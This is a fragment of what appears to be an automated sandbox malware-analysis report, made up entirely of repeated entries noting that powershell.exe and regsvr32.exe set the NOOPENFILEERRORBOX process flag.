      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
